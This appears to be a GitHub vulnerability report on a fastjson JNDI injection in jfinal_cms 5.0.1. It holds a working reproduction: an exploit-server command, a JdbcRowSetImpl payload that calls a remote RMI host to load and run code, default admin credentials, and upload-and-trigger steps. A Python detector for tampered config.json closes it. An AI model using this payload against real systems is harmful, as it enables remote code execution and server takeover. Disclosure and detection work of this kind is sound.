
Administrator Interface Command Execution Vulnerability #28

Open
@sp4zcmd

Description

Vulnerability summary

A remote command execution vulnerability exists in jfinal_cms 5.0.1: the bundled fastjson 1.2.28 deserializes an attacker-replaceable config.json, which allows a JNDI injection.

JDK version requirements (the JNDI lookup only loads a remote class on older JDKs):

  • RMI-based exploitation: JDK <= 6u141, 7u131, 8u121
  • LDAP-based exploitation: JDK <= 6u211, 7u201, 8u191

jfinal_cms version: 5.0.1

fastjson version: 1.2.28

Vulnerability reproduction

JDK version used in the test: JDK8u101

Run the tool on Kali to start the RMI and LDAP services:

https://github.com/feihong-cs/JNDIExploit

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc.exe"


Replace the RMI or LDAP address in the payload with the one served by the tool:

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.248.128:1099/6dxg2x",
        "autoCommit":true
    }
}

Create a config.json file and paste the payload into it.


Log in to the backend management system and select template management.

Default credentials: admin/admin123


Click config.json.

Click Replace file.


Replace it with the config.json file containing the payload created above.

Visit /ueditor; the command is executed and the calculator pops up.

http://localhost:8080/jfinal_cms/ueditor


Vulnerability analysis

com.jflyfox.component.controller.Ueditor

The ActionEnter class is instantiated in the index method of the /ueditor route.

com.baidu.ueditor.ActionEnter#ActionEnter

The ConfigManager class is instantiated in the constructor of ActionEnter.

com.baidu.ueditor.ConfigManager#ConfigManager

The ConfigManager constructor calls initEnv().

com.baidu.ueditor.ConfigManager#initEnv

initEnv() calls JSONObject.parseObject on the file content. That content is attacker-controllable, so replacing the file content with the payload is enough to reach the fastjson gadget.

com.baidu.ueditor.ConfigManager

The file is loaded from WEB-INF/classes/config.json. With any arbitrary file upload or file replacement in the backend (here, the template management feature), this file can be swapped for one containing the payload, and the next request to /ueditor triggers fastjson deserialization of it.
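Because config.json is re-parsed on every /ueditor request, a defender can treat it as a deploy-time artefact and check it before or after deployment. The following Python is an added example, not part of jfinal_cms or ueditor: check_config() flags the two markers that never belong in a legitimate ueditor config (a fastjson "@type" key and a JNDI-scheme URL), and verify_integrity() compares the deployed file against a hash recorded at deploy time. The BENIGN sample is a constructed stand-in for the real settings file; PAYLOAD is the payload from this issue.

```python
import hashlib
import json
import re
from typing import Any, List, Tuple

# ueditor's real config.json holds only plain upload settings. fastjson
# <= 1.2.28 honours "@type" and instantiates the named class, and a
# JdbcRowSetImpl whose dataSourceName is a remote URL performs a JNDI
# lookup, so either marker in this file means it has been tampered with.
TYPE_KEY = "@type"
JNDI_SCHEME = re.compile(r"^(rmi|ldap|ldaps|iiop)://", re.IGNORECASE)


def scan(node: Any, path: str = "$") -> List[Tuple[str, str]]:
    """Walk parsed JSON and return (json_path, reason) for each marker found."""
    findings: List[Tuple[str, str]] = []
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}"
            if key == TYPE_KEY:
                findings.append((child, f"autotype marker {value!r}"))
            if isinstance(value, str) and JNDI_SCHEME.match(value):
                findings.append((child, f"JNDI URL {value!r}"))
            findings.extend(scan(value, child))
    elif isinstance(node, list):
        for i, item in enumerate(node):
            findings.extend(scan(item, f"{path}[{i}]"))
    return findings


def check_config(text: str) -> List[Tuple[str, str]]:
    """Parse config.json text and report tampering markers (empty list = clean)."""
    return scan(json.loads(text))


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def verify_integrity(text: str, expected_sha256: str) -> bool:
    """True when the deployed file still matches the hash recorded at deploy time."""
    return sha256_hex(text) == expected_sha256


# Constructed sample of benign ueditor settings (not the project's real file).
BENIGN = '{"imageActionName": "uploadimage", "imageMaxSize": 2048000}'
# The payload from the issue above, whitespace compacted.
PAYLOAD = """{"a": {"@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl"},
 "b": {"@type": "com.sun.rowset.JdbcRowSetImpl",
       "dataSourceName": "rmi://192.168.248.128:1099/6dxg2x", "autoCommit": true}}"""
```

The scan reports three findings for the issue's payload (both "@type" keys and the rmi:// dataSourceName) and none for the benign sample; the integrity check is the stronger control, since it also catches gadget chains the marker list does not know about.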
